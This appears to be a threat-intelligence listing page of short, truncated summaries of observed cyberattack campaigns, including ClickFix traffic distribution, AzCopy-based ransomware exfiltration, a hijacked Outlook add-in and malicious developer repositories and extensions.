-
The Evolution of ClickFix: Inside ErrTraffic’s GlitchFix Attack Panel
Observed in the wild Censys researchers analysed ErrTraffic, a traffic‑distribution system used in GlitchFix/ClickFix social‑engineering attacks. They identified multiple live panels (v2 and v3) in the wild across various hosts, including one misconfigured instance that exposed the full source code. The tool targets global…
-
AzCopy: Living off the Land Data Exfiltration in Modern Ransomware
Observed in the wild In incidents investigated and published by Varonis Threat Labs (March 2026), ransomware operators were observed exfiltrating large volumes of sensitive enterprise data using Microsoft’s AzCopy utility prior to encryption. Multiple victim organisations were impacted, with at least one confirmed case…
-
Iran Aligned Hacktivists and APTs Increase Low to Medium Impact Cyber Attacks
Observed in the wild From 28 February, Unit 42 observed a sharp escalation in Iran linked cyber activity following U.S. and Israeli military operations. Government, critical infrastructure, energy, healthcare and logistics organisations in the U.S., Israel and allied regions were primarily targeted, largely by hacktivist…
-
Coordinated Proxy Based Scanning Targets SonicWall Firewalls
Observed in the wild Between 22–25 February, GreyNoise observed a coordinated reconnaissance campaign generating 84,142 scanning sessions from 4,305 unique IPs, targeting internet‑exposed SonicWall SonicOS firewalls, specifically organisations running SSL VPN services. The activity was global, highly structured, and…
-
ShinyHunters escalate vishing-led extortion across tech and telecoms
Observed in the wild In February, the ShinyHunters-linked activity targeted Optimizely, a global ad‑tech firm, via a contained breach of internal business systems, and Dutch telecoms provider Odido, where attackers exfiltrated customer contact data affecting ~6.2 million users, later claiming up to 21 million records. Both…
-
AgreeToSteal: First Malicious Outlook Add In Abuses Microsoft Marketplace Trust
Observed in the wild In February, Koi Security disclosed AgreeToSteal, the first known malicious Microsoft Outlook add‑in in the wild. A legitimate but abandoned scheduling add‑in (“AgreeTo”), originally published in December 2022, was hijacked, leading to the theft of over 4,000 Microsoft account credentials (and some…
-
Malicious Next.js Repositories Used to Target Developers via Staged C2
Observed in the wild In February, Microsoft identified a coordinated campaign targeting software developers, particularly those using Next.js and Node.js. Targets were lured via fake technical assessments and seemingly legitimate repositories on public code-hosting platforms. Execution typically occurred during routine…
-
APT28 Exploits Office Macros and Webhooks in Operation MacroMaze
Observed in the wild LAB52 reported Operation MacroMaze, an APT28‑attributed campaign active from late September 2025 to January 2026, targeting specific entities in Western and Central Europe. Victims received highly targeted spear‑phishing emails carrying malicious Microsoft Word documents designed to appear legitimate,…
-
VS Code and Browser Extension Malware Targets Developers Through AI Tools and Stanley Kit
Observed in the wild MaliciousCorgi, a campaign discovered in January 2025, deployed malicious VS Code extensions disguised as AI coding assistants (including "ChatGPT – 中文版" and "ChatMoss (CodeMoss)") that infected approximately 1.5 million developers globally. Separately, the Stanley malware kit has been active since…
-
Spam Campaign Abuses Atlassian Jira, Targets Government and Corporate Entities
Observed in the wild Between late December and late January 2026, threat actors abused Atlassian Jira Cloud to send spam and scam emails to government bodies and corporate organisations worldwide, particularly those already using Jira. Messages appeared as legitimate Jira notifications and were localised across multiple…